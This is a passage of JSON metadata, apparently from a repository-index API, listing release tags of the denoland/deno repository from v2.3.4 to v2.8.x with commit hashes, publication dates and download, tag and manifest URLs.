.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url"